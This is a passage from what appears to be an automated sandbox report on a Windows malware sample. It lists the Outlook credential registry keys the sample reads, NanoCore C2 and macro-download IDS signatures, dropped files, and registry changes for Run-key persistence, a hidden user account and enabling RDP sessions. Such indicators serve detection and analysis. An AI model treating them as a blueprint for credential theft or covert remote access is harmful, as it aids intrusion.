  1533. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Server"
  1534.  
  1535.  
  1536. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Password"
  1537.  
  1538.  
  1539. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Account Name"
  1540.  
  1541.  
  1542. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Server"
  1543.  
  1544.  
  1545. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  1546.  
  1547.  
  1548. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP Password"
  1549.  
  1550.  
  1551. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  1552.  
  1553.  
  1554. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP Password"
  1555.  
  1556.  
  1557. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Password"
  1558.  
  1559.  
  1560. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Password"
  1561.  
  1562.  
  1563. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  1564.  
  1565.  
  1566. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 User"
  1567.  
  1568.  
  1569. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Server"
  1570.  
  1571.  
  1572. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Password"
  1573.  
  1574.  
  1575. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 User"
  1576.  
  1577.  
  1578. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Account Name"
  1579.  
  1580.  
  1581. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Password"
  1582.  
  1583.  
  1584. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  1585.  
  1586.  
  1587. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Server"
  1588.  
  1589.  
  1590. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Password"
  1591.  
  1592.  
  1593. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  1594.  
  1595.  
  1596.  
  1597.  
  1598. "Description": "Generates some ICMP traffic",
  1599. "Details":
  1600.  
  1601.  
  1602. "Description": "Collects information to fingerprint the system",
  1603. "Details":
  1604.  
  1605.  
  1606. "Description": "Created network traffic indicative of malicious activity",
  1607. "Details":
  1608.  
  1609. "signature": "ET TROJAN Possible NanoCore C2 60B"
  1610.  
  1611.  
  1612. "signature": "ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016"
  1613.  
  1614.  
  1615. "signature": "ET CURRENT_EVENTS Possible Malicious Macro EXE DL AlphaNumL"
  1616.  
  1617.  
  1618.  
  1619.  
  1620.  
  1621. * Started Service:
  1622. "TermService",
  1623. "VaultSvc",
  1624. "WerSvc",
  1625. "UmRdpService"
  1626.  
  1627.  
  1628. * Mutexes:
  1629. "Local\\_!MSFTHISTORY!_",
  1630. "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
  1631. "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
  1632. "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
  1633. "Local\\WininetStartupMutex",
  1634. "Local\\WininetConnectionMutex",
  1635. "Local\\WininetProxyRegistryMutex",
  1636. "Global\\CLR_CASOFF_MUTEX",
  1637. "DefaultTabtip-MainUI",
  1638. "CicLoadWinStaWinSta0",
  1639. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  1640. "Local\\ZoneAttributeCacheCounterMutex",
  1641. "Local\\ZonesCacheCounterMutex",
  1642. "Local\\ZonesLockedCacheCounterMutex",
  1643. "TSLicensingLock",
  1644. "Global\\d6ba4b97-e344-402c-8bc9-737f0cbf68ea",
  1645. "Global\\.net clr networking",
  1646. "Local\\WERReportingForProcess1212",
  1647. "Global\\bca07779-bb70-11e9-81e8-18c086cd4733",
  1648. "Global\\ADAP_WMI_ENTRY"
  1649.  
  1650.  
  1651. * Modified Files:
  1652. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
  1653. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
  1654. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
  1655. "C:\\ProgramData\\images.exe",
  1656. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  1657. "\\??\\PIPE\\srvsvc",
  1658. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\9SB1EHE2O2TT8HT5MNLA.temp",
  1659. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
  1660. "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\10-08-2019_07.36.26",
  1661. "\\??\\PIPE\\samr",
  1662. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\paso1111.exe",
  1663. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PA320MG8\\turnx1.exe",
  1664. "C:\\Program Files\\Microsoft DN1\\sqlmap.dll",
  1665. "C:\\Program Files\\Microsoft DN1\\rdpwrap.ini",
  1666. "C:\\Users\\user\\AppData\\Roaming\\Fg.bFic.tmp",
  1667. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\KCANALLUJWTLJB6LXT0E.temp",
  1668. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5286d4.TMP",
  1669. "C:\\Windows\\inf\\setupapi.dev.log",
  1670. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  1671. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  1672. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  1673. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  1674. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  1675. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  1676. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  1677. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  1678. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5431031",
  1679. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jig.dat",
  1680. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\por=iwi",
  1681. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\hqc.vbs",
  1682. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe",
  1683. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\tjx.ico",
  1684. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\pao.mp4",
  1685. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uuq.bmp",
  1686. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\gst.icm",
  1687. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dkr.mp4",
  1688. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kgg.icm",
  1689. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uel.xl",
  1690. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\epu.ppt",
  1691. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\aej.mp3",
  1692. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\osx.ico",
  1693. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\lis.mp3",
  1694. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dti.mp4",
  1695. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ufp.ppt",
  1696. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mfs.docx",
  1697. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uhp.jpg",
  1698. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\qjd.xl",
  1699. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uph.jpg",
  1700. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\fvg.ico",
  1701. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\rcs.icm",
  1702. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\car.bmp",
  1703. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\sbq.bmp",
  1704. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\lua.mp3",
  1705. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\nfb.dat",
  1706. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kie.mp3",
  1707. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\wwk.xl",
  1708. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\exw.bmp",
  1709. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\gvf.docx",
  1710. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\msw.dat",
  1711. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\bwi.icm",
  1712. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\pii.ppt",
  1713. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ran.docx",
  1714. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\tlt.txt",
  1715. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\skw.icm",
  1716. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dpu.ico",
  1717. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\obx.jpg",
  1718. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jao.mp3",
  1719. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jcp.mp3",
  1720. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ttd.jpg",
  1721. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\rvm.icm",
  1722. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kai.ppt",
  1723. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\qsh.jpg",
  1724. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\arr.jpg",
  1725. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ikl.bmp",
  1726. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ctx.mp3",
  1727. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mhf.jpg",
  1728. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\vki.dat",
  1729. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\aio.icm",
  1730. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mnm.jpg",
  1731. "C:\\rdpwrap.txt",
  1732. "\\Device\\Termdd",
  1733. "\\Device\\RdpDr",
  1734. "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
  1735. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\WKZDQ",
  1736. "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\10-08-2019_07.37.04",
  1737. "C:\\Users\\user\\AppData\\Roaming\\zw.nJe..tmp",
  1738. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\NK75L0VZKCM5AJXJ5LAQ.temp",
  1739. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF53f6a1.TMP",
  1740. "C:\\Users\\user\\AppData\\Roaming\\C1515A12-1764-4632-ACE9-A9DFF9253200\\run.dat",
  1741. "C:\\Program Files (x86)\\DSL Subsystem\\dslss.exe",
  1742. "C:\\Users\\user\\AppData\\Local\\Temp\\tmp6BE8.tmp",
  1743. "C:\\Users\\user\\AppData\\Local\\Temp\\tmp953B.tmp",
  1744. "C:\\Users\\user\\AppData\\Roaming\\C1515A12-1764-4632-ACE9-A9DFF9253200\\catalog.dat",
  1745. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\OT277IUZQGETZPBWEMRU.temp",
  1746. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF54169c.TMP",
  1747. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5496890",
  1748. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
  1749. "\\Device\\LanmanDatagramReceiver",
  1750. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\GIP7DEH2ZWQ1M67P0IFF.temp",
  1751. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF549419.TMP",
  1752. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportArchive\\AppCrash_qDABnKekr.exe_bea1e58056a849b25f9ce14267c2eac9f86898a8_0c988def\\Report.wer",
  1753. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ONKAZ",
  1754. "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\10-08-2019_07.38.12",
  1755. "C:\\Users\\user\\AppData\\Roaming\\IhBGrhG.tmp",
  1756. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\HMHQ8PLQENE0CHLORZDB.temp",
  1757. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5511b5.TMP",
  1758. "\\??\\Nul",
  1759. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5564453",
  1760. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\GYTEI"
  1761.  
  1762.  
  1763. * Deleted Files:
  1764. "C:\\ProgramData\\images.exe:Zone.Identifier",
  1765. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\9SB1EHE2O2TT8HT5MNLA.temp",
  1766. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2024.5405437",
  1767. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2024.5405437",
  1768. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2024.5405437",
  1769. "C:\\Users\\user\\AppData\\Roaming\\Fg.bFic.tmp",
  1770. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5286d4.TMP",
  1771. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.832.5409109",
  1772. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.832.5409109",
  1773. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.832.5409109",
  1774. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5431031",
  1775. "C:\\Users\\user\\AppData\\Roaming\\zw.nJe..tmp",
  1776. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF53f6a1.TMP",
  1777. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2728.5502687",
  1778. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2728.5502687",
  1779. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2728.5502687",
  1780. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\WKZDQ",
  1781. "C:\\Program Files (x86)\\DSL Subsystem\\dslss.exe",
  1782. "C:\\Users\\user\\AppData\\Roaming\\C1515A12-1764-4632-ACE9-A9DFF9253200\\DSL Subsystem\\dslss.exe",
  1783. "C:\\Users\\user\\AppData\\Local\\Temp\\tmp6BE8.tmp",
  1784. "C:\\Users\\user\\AppData\\Local\\Temp\\tmp953B.tmp",
  1785. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe:Zone.Identifier",
  1786. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF54169c.TMP",
  1787. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2512.5511687",
  1788. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2512.5511687",
  1789. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2512.5511687",
  1790. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5496890",
  1791. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF549419.TMP",
  1792. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1624.5543906",
  1793. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1624.5543906",
  1794. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1624.5543906",
  1795. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ONKAZ",
  1796. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.3892.5526703",
  1797. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3892.5526703",
  1798. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.3892.5526703",
  1799. "C:\\Users\\user\\AppData\\Roaming\\IhBGrhG.tmp",
  1800. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5511b5.TMP",
  1801. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.3252.5575828",
  1802. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3252.5575828",
  1803. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.3252.5575828",
  1804. "C:\\ProgramData\\images.exe",
  1805. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5564453",
  1806. "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\GYTEI",
  1807. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2016.5574718",
  1808. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2016.5574718",
  1809. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2016.5574734"
  1810.  
  1811.  
  1812. * Modified Registry Keys:
  1813. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
  1814. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
  1815. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
  1816. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
  1817. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPer1_0Server",
  1818. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer",
  1819. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\M6YPPZQAL3",
  1820. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\M6YPPZQAL3\\inst",
  1821. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images",
  1822. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  1823. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\images_RASAPI32",
  1824. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableFileTracing",
  1825. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableConsoleTracing",
  1826. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileTracingMask",
  1827. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\ConsoleTracingMask",
  1828. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\MaxFileSize",
  1829. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileDirectory",
  1830. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
  1831. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\BmEIHkw",
  1832. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\M6YPPZQAL3\\rudp",
  1833. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\M6YPPZQAL3\\rpdp",
  1834. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
  1835. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
  1836. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
  1837. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
  1838. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
  1839. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus",
  1840. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\StartTime",
  1841. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\CurrentStatus\\Progress",
  1842. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties",
  1843. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29",
  1844. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009",
  1845. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000",
  1846. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Type",
  1847. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\UMB\\UMB\\1&841921d&0&TSBUS\\Properties\\83da6326-97a6-4088-9453-a1923f573b29\\00000009\\00000000\\Data",
  1848. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus",
  1849. "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SetupapiLogStatus\\setupapi.dev.log",
  1850. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  1851. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  1852. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  1853. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  1854. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  1855. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  1856. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  1857. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
  1858. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  1859. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  1860. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\kB_RASAPI32",
  1861. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\EnableFileTracing",
  1862. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\EnableConsoleTracing",
  1863. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\FileTracingMask",
  1864. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\kB_RASAPI32\\ConsoleTracingMask",
